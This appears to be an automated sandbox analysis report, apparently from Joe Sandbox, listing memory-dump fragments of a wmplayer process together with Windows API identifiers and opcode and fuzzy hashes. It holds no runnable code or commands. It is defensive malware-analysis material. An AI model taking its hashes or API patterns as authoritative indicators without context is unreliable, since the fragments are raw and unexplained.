                                                                                                                                                                                                                                                                                                          • API String ID: 2553196624-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 415f8c0571b75c1991b96738212bb360d575a4f83167df857c6c0e594fa1838b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7931A13161998C4FEB55FF24D8896EAB3D4FBB4344F10452FE44BC3196EA30E6188782

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                                                                                                                                          • API String ID: 716092398-3110715001
                                                                                                                                                                                                                                                                                                          • Opcode ID: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5074a02046e128dbccf3f0c164d2ed56f2a77c304b4e98521fb94597c30271e1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3514170518B848FD765EF24D88A79ABBE4FBA9351F10462FE08EC2290DF349545CB83

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693745130.00007DF4F81B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81B1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81b1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionMessageProtectSendTableVirtualcalloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2453823186-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                                                                                                                                                                                                          • Instruction ID: c191d9e3199e245dbdb9e91668a2851c4b9d77cd5f650bd3a574e206fc762d04
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7B12E31A5CA484BEBA9EF24D5845AB73E1EF94300F548B2AE04FC7192DE38E915C781

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2694286045.00007DF4F8201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F8201000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f8201000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionMessageProtectSendTableVirtualcalloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2453823186-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                                                                                                                                                                                                          • Instruction ID: a37558179a4dc401233842aaede3b05ba64c0f641fa249d10040a6a9af603050
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B371513065CA488FDB98EF28D8815AB73F1FF54704B51866AE44FCB196DA78F9018BC1

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AllocInfoSystemVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3440192736-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                                                                                                                                                                                                          • Instruction ID: daee3b47e2db2db0f1bff672a0e0a786676b5568934bfa3bd2e73d4e80ce7946
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C651B13021DE4D4FFB55EA7C948C3A972D1F7B8385F54012BE849C3196EA64E9A1C7C2

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseFileHandleView
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693991143.00007DF4F81D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81D1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81d1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2694286045.00007DF4F8201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F8201000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f8201000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693745130.00007DF4F81B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81B1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81b1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000003.2166351595.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_3_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693452463.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000003.2166351595.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_3_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileMappingOpen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1680863896-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693745130.00007DF4F81B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81B1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81b1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: EventHook
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3661607649-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2694286045.00007DF4F8201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F8201000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f8201000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: EventHook
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3661607649-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressCallerProc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2663294120-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693991143.00007DF4F81D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81D1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81d1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2694286045.00007DF4F8201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F8201000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f8201000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693745130.00007DF4F81B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81B1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81b1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000003.2166351595.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_3_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693452463.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693991143.00007DF4F81D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81D1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81d1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionProtectTableVirtualcalloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3747249976-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 542ed1d49eb6963af29ee6fe29f9a03794f187a1c862330fe1215d2d8235d0f4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C31180302099598FFF76AF6D88887A532E4FB78369F14017BE80DCA195CB709C94C792
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2694286045.00007DF4F8201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F8201000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f8201000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 824716752341d80b75d8ee6151b82c4d32d575334c5b2856fbabe19722d7ec18
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4133e08214f52128653c88f415440736682cfce25d501ffcbf25ad9c4b151995
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 824716752341d80b75d8ee6151b82c4d32d575334c5b2856fbabe19722d7ec18
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC118430A44D598FFFA5DFA9849476632E0EF98311F15027BE80ECE199CB38AC40C791
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                                                                                                                                                                                                          • Instruction ID: 916e75afabdd0c865f286684d1e409ab2005df662934ff18f778e03481a12e0b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86F01D70216E4B8FEB85EF29C4D87A073E4FB7834AF64016A9409C25A0D7759D65C706
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
